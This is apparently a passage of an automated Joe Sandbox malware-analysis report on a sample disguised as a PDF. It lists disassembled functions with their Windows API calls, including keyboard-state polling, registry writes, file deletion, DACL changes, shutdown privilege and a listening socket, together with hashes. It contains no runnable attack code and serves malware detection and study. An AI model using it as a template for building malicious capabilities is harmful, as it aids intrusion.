                                                                          • Opcode Fuzzy Hash: 304922502741d2ae5afb325700ef7a18d4165bbc340aa0600bcc9c2bd780b665
                                                                          • Instruction Fuzzy Hash: 8B31AE7660121A6ADB10DFA4EC98AFE77ECEF08360F1401B6F814D30A0EB74DB459A64
                                                                          APIs
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B60BDE
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B6F910,00000000,?,00000000,?,?), ref: 00B60C4C
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B60C94
                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B60D1D
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00B6103D
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B6104A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 536824911-966354055
                                                                          • Opcode ID: f8a20aa9f108082977a93f182f58caa6e60d641c9da0001b8b2c1a6f215fddc6
                                                                          • Instruction ID: fe340a4c3aa5d18d012c6033b2b4562b1ee7bd422a8f546f61f41ed3a8c0b548
                                                                          • Opcode Fuzzy Hash: f8a20aa9f108082977a93f182f58caa6e60d641c9da0001b8b2c1a6f215fddc6
                                                                          • Instruction Fuzzy Hash: 92025C756006519FCB14EF19C995E2AB7E5FF88714F04889DF88A9B3A2CB34ED41CB81
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B4F37E
                                                                          • _wcscmp.LIBCMT ref: 00B4F393
                                                                          • _wcscmp.LIBCMT ref: 00B4F3AA
                                                                            • Part of subcall function 00B445C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B445DC
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B4F3D9
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F3E4
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00B4F400
                                                                          • _wcscmp.LIBCMT ref: 00B4F427
                                                                          • _wcscmp.LIBCMT ref: 00B4F43E
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B4F450
                                                                          • SetCurrentDirectoryW.KERNEL32(00B9A5A0), ref: 00B4F46E
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B4F478
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F485
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F497
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*
                                                                          • API String ID: 1824444939-438819550
                                                                          • Opcode ID: 2e918d395205c9884b0016fb77a050917a68dedcb236074f4e10a4e331923988
                                                                          • Instruction ID: d625a27210f19aa149cba2fde3ca8f08d449c8d6eb5072a8b081ee3b479c6ef8
                                                                          • Opcode Fuzzy Hash: 2e918d395205c9884b0016fb77a050917a68dedcb236074f4e10a4e331923988
                                                                          • Instruction Fuzzy Hash: FA319E7660121A6ACF10AFA4EC98AFE77ECDF49360F1401F6E854A31A0DB74DF44DA64
                                                                          APIs
                                                                            • Part of subcall function 00B3874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B38766
                                                                            • Part of subcall function 00B3874A: GetLastError.KERNEL32(?,00B3822A,?,?,?), ref: 00B38770
                                                                            • Part of subcall function 00B3874A: GetProcessHeap.KERNEL32(00000008,?,?,00B3822A,?,?,?), ref: 00B3877F
                                                                            • Part of subcall function 00B3874A: HeapAlloc.KERNEL32(00000000,?,00B3822A,?,?,?), ref: 00B38786
                                                                            • Part of subcall function 00B3874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B3879D
                                                                            • Part of subcall function 00B387E7: GetProcessHeap.KERNEL32(00000008,00B38240,00000000,00000000,?,00B38240,?), ref: 00B387F3
                                                                            • Part of subcall function 00B387E7: HeapAlloc.KERNEL32(00000000,?,00B38240,?), ref: 00B387FA
                                                                            • Part of subcall function 00B387E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B38240,?), ref: 00B3880B
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B3825B
                                                                          • _memset.LIBCMT ref: 00B38270
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B3828F
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00B382A0
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B382DD
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B382F9
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00B38316
                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B38325
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B3832C
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B3834D
                                                                          • CopySid.ADVAPI32(00000000), ref: 00B38354
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B38385
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B383AB
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B383BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                          • String ID:
                                                                          • API String ID: 3996160137-0
                                                                          • Opcode ID: a72e9ef52b2e8cf014b41e543ba2992c544599d1672a5365134801e1a30423fc
                                                                          • Instruction ID: e409a53058b39dc83f745b6b45379fdc6c407f6401ab81ecde8a017d8f3b50d7
                                                                          • Opcode Fuzzy Hash: a72e9ef52b2e8cf014b41e543ba2992c544599d1672a5365134801e1a30423fc
                                                                          • Instruction Fuzzy Hash: 9C61677190020AEFCF009FA4DC85AEEBBB9FF04700F2481A9F815A7291DF759A05CB61
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                          • API String ID: 0-4052911093
                                                                          • Opcode ID: b9df19ff244a47d86ce8a1f35f37d48de0e0a94bf7af0538aa7deea186774f10
                                                                          • Instruction ID: ce58ecf6435fd65798b4fbdf4c87ca66859ae5b7ac1160664f0070a2bec5bd3e
                                                                          • Opcode Fuzzy Hash: b9df19ff244a47d86ce8a1f35f37d48de0e0a94bf7af0538aa7deea186774f10
                                                                          • Instruction Fuzzy Hash: CB724F75E00219DBDB24CF99C8807BEB7F5EF48710F2485AAE949EB290DB749D41CB90
                                                                          APIs
                                                                            • Part of subcall function 00B610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B60038,?,?), ref: 00B610BC
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B60737
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B607D6
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B6086E
                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B60AAD
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B60ABA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1240663315-0
                                                                          • Opcode ID: cf30bd33370a501c9f67e54bf0c8e853bf11781e7c64cd99cbb56246734355a2
                                                                          • Instruction ID: 4e42b0f4e9680103ec59ecc9dd1384e1e1c3622b0eaff45c989d6beb9dfba27d
                                                                          • Opcode Fuzzy Hash: cf30bd33370a501c9f67e54bf0c8e853bf11781e7c64cd99cbb56246734355a2
                                                                          • Instruction Fuzzy Hash: 27E14C31214300AFCB14EF69C991E2BBBE4EF89714B0489ADF449DB2A2DA34ED01CB51
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00B40241
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00B402C2
                                                                          • GetKeyState.USER32(000000A0), ref: 00B402DD
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00B402F7
                                                                          • GetKeyState.USER32(000000A1), ref: 00B4030C
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00B40324
                                                                          • GetKeyState.USER32(00000011), ref: 00B40336
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00B4034E
                                                                          • GetKeyState.USER32(00000012), ref: 00B40360
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00B40378
                                                                          • GetKeyState.USER32(0000005B), ref: 00B4038A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 38ad4801283ba3f87ce408c8cdf687482f76c4e970ce21b9520a8930396762a7
                                                                          • Instruction ID: dc7781b43d97bc336f251fcb0941193f8b2d7bc77d067644f499a73ce5d216f7
                                                                          • Opcode Fuzzy Hash: 38ad4801283ba3f87ce408c8cdf687482f76c4e970ce21b9520a8930396762a7
                                                                          • Instruction Fuzzy Hash: 894186245247CA6AFF31AA6494083B5BEE0EB15340F0840DEDBC6471C2DBF45EC4AB96
                                                                          APIs
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • CoInitialize.OLE32 ref: 00B58718
                                                                          • CoUninitialize.OLE32 ref: 00B58723
                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00B72BEC,?), ref: 00B58783
                                                                          • IIDFromString.OLE32(?,?), ref: 00B587F6
                                                                          • VariantInit.OLEAUT32(?), ref: 00B58890
                                                                          • VariantClear.OLEAUT32(?), ref: 00B588F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 834269672-1287834457
                                                                          • Opcode ID: 96302fc8b92a4ba7c494a486ce0e896fe7e65b17c070d038a42212a25e99780f
                                                                          • Instruction ID: eebf28eb56807c07eec2e675ff71ffe0bf76c60aa337a62a73f8ace6d6b56754
                                                                          • Opcode Fuzzy Hash: 96302fc8b92a4ba7c494a486ce0e896fe7e65b17c070d038a42212a25e99780f
                                                                          • Instruction Fuzzy Hash: FC61AE70608311AFD710DF24D985B6BBBE4EF48715F1048D9F985AB2A1DB70ED48CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: e21b9910a31993ffcad6f8ddf9062de7445f3a27b67b31bc8db5ffa971775d61
                                                                          • Instruction ID: 3a130e30acaca082cc651d331f3ec104e600c9f5b4163d706c59309547261037
                                                                          • Opcode Fuzzy Hash: e21b9910a31993ffcad6f8ddf9062de7445f3a27b67b31bc8db5ffa971775d61
                                                                          • Instruction Fuzzy Hash: FD218B75200211AFDB10AF24EC49B7A7BA8EF54715F1080AAF906DB2B1DFB8AD01CB54
                                                                          APIs
                                                                            • Part of subcall function 00AE48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE48A1,?,?,00AE37C0,?), ref: 00AE48CE
                                                                            • Part of subcall function 00B44CD3: GetFileAttributesW.KERNEL32(?,00B43947), ref: 00B44CD4
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B43ADF
                                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B43B87
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00B43B9A
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B43BB7
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B43BD9
                                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B43BF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                          • String ID: \*.*
                                                                          • API String ID: 4002782344-1173974218
                                                                          • Opcode ID: 135461ecb068cf73a7424485f254d7db5e209eb8d37949cb9b80a65f6530af0a
                                                                          • Instruction ID: 0811391f1ac8d0b6852d6bdeb1bbe0840d0e1c7f47135dce6176a8d62bb77d79
                                                                          • Opcode Fuzzy Hash: 135461ecb068cf73a7424485f254d7db5e209eb8d37949cb9b80a65f6530af0a
                                                                          • Instruction Fuzzy Hash: B95181318052899ACF05EBA1DE929FDB7F9EF14300F6841A9E44177092DF716F09DBA0
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B4F6AB
                                                                          • Sleep.KERNEL32(0000000A), ref: 00B4F6DB
                                                                          • _wcscmp.LIBCMT ref: 00B4F6EF
                                                                          • _wcscmp.LIBCMT ref: 00B4F70A
                                                                          • FindNextFileW.KERNEL32(?,?), ref: 00B4F7A8
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F7BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                          • String ID: *.*
                                                                          • API String ID: 713712311-438819550
                                                                          • Opcode ID: 3f3156cf904a33c84f93a30b47f2231aa9933d3801849b5e3b6b3d2ee3ec2efe
                                                                          • Instruction ID: e6555ed2c742430b362e2fb6d2f3cd140ae1ed92e01d009a7dbb84e0cdc8647b
                                                                          • Opcode Fuzzy Hash: 3f3156cf904a33c84f93a30b47f2231aa9933d3801849b5e3b6b3d2ee3ec2efe
                                                                          • Instruction Fuzzy Hash: 59417C7190021AABDF11DF64CC99AFEBBF4FF05310F1445A6E815A31A0EB349E44DBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                          • API String ID: 0-1546025612
                                                                          • Opcode ID: ba1ddd1f58d267ec2022cc5cdb8f77956ca1d82a07f182cf0c6251b2210d65d1
                                                                          • Instruction ID: 525e2fb9a3f6463f1f92c95c488aff14dc5e759b83c954168e010f0aad0b15f0
                                                                          • Opcode Fuzzy Hash: ba1ddd1f58d267ec2022cc5cdb8f77956ca1d82a07f182cf0c6251b2210d65d1
                                                                          • Instruction Fuzzy Hash: 78A28270E0422E8BDF24DF98D9907BEB7B1FB58314F1481A9E959A7280DB709E81CF54
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 819e5c002154a14e35f59f58ce69fd2797860fdb7b4450f0871abfcbca63d3e2
                                                                          • Instruction ID: d79fe40681273bbeb39ac30e2527f74e4f57d13c41bf1b2c49976e6701bc6508
                                                                          • Opcode Fuzzy Hash: 819e5c002154a14e35f59f58ce69fd2797860fdb7b4450f0871abfcbca63d3e2
                                                                          • Instruction Fuzzy Hash: A612A970E00609DFDF14DFA5DA81AAEB7F5FF48300F2086A9E546A7291EB35AD11CB50
                                                                          APIs
                                                                            • Part of subcall function 00B38CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B38D0D
                                                                            • Part of subcall function 00B38CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B38D3A
                                                                            • Part of subcall function 00B38CC3: GetLastError.KERNEL32 ref: 00B38D47
                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00B4549B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                          • String ID: $@$SeShutdownPrivilege
                                                                          • API String ID: 2234035333-194228
                                                                          • Opcode ID: d2f2e1aff8325b3be8c7fa197043a6930212bf7edaac451a5c02a22d9c4f8032
                                                                          • Instruction ID: 4ae29cfe83678b64cb6dd8b6e68898145f027ff2f9295f78782b461f5383bc57
                                                                          • Opcode Fuzzy Hash: d2f2e1aff8325b3be8c7fa197043a6930212bf7edaac451a5c02a22d9c4f8032
                                                                          • Instruction Fuzzy Hash: 67014771655F026BF7385674EC8ABBA72D8EB00752F3400B0FC07DA2D7DA940E80A190
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B565EF
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B565FE
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00B5661A
                                                                          • listen.WSOCK32(00000000,00000005), ref: 00B56629
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B56643
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00B56657
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                          • String ID:
                                                                          • API String ID: 1279440585-0
                                                                          • Opcode ID: d14097267aae753fbbd42e05797c5c65be832c7a236d5047661200c769892307
                                                                          • Instruction ID: 7e1871b0021f749f2f6a9e987ca69a3b63ce8408ca8cb3a903243f336d9fc4be
                                                                          • Opcode Fuzzy Hash: d14097267aae753fbbd42e05797c5c65be832c7a236d5047661200c769892307
                                                                          • Instruction Fuzzy Hash: 04219C30600205AFCB10AF24D985B7EB7E9EF48321F2481A9E95AE73E1CB74AD058B51
                                                                          APIs
                                                                            • Part of subcall function 00B00FF6: std::exception::exception.LIBCMT ref: 00B0102C
                                                                            • Part of subcall function 00B00FF6: __CxxThrowException@8.LIBCMT ref: 00B01041
